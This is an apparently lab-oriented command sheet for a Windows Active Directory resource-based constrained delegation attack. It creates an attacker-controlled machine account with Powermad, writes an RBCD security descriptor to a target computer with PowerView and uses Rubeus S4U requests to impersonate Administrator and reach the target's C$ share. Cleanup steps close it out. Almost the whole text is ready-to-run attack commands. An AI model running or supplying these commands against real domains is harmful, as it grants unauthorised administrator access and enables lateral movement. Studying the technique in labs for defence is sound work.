The Windows RBCD flow creates or controls a machine account, writes a security descriptor into the target computer's msDS-AllowedToActOnBehalfOfOtherIdentity, then uses S4U to impersonate a user to a target service.
Create a controlled machine with Powermad
Import-Module .\Powermad.ps1
New-MachineAccount -MachineAccount ATTACKER01 -Password $(ConvertTo-SecureString "Password123!" -AsPlainText -Force)
Build the RBCD security descriptor
Import-Module .\PowerView.ps1
$ComputerSid = Get-DomainComputer ATTACKER01 -Properties objectsid | Select-Object -ExpandProperty objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Write RBCD to the target
$SecPassword = ConvertTo-SecureString 'student' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('ootw.local\student', $SecPassword)
Get-DomainComputer TARGET01 | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Credential $Cred -Verbose
Get the controlled machine hash
Rubeus.exe hash /password:Password123! /user:ATTACKER01$ /domain:ootw.local
Request S4U ticket
Rubeus.exe s4u /user:ATTACKER01$ /rc4:<ATTACKER01_NTLM> /impersonateuser:Administrator /msdsspn:cifs/target01.ootw.local /ptt
klist
dir \\target01.ootw.local\c$
Request additional service classes
Rubeus.exe s4u /user:ATTACKER01$ /rc4:<ATTACKER01_NTLM> /impersonateuser:Administrator /msdsspn:cifs/target01.ootw.local /altservice:host,http,wsman,ldap /ptt
Cleanup
Get-DomainComputer TARGET01 | Set-DomainObject -Clear msDS-AllowedToActOnBehalfOfOtherIdentity -Credential $Cred -Verbose
Remove-ADComputer ATTACKER01 -Confirm:$false
Verify cleanup
Get-DomainComputer TARGET01 -Properties msDS-AllowedToActOnBehalfOfOtherIdentity
Notes
If the target object already had legitimate RBCD entries, do not blindly clear the whole attribute. Save the original value first and restore it after the lab.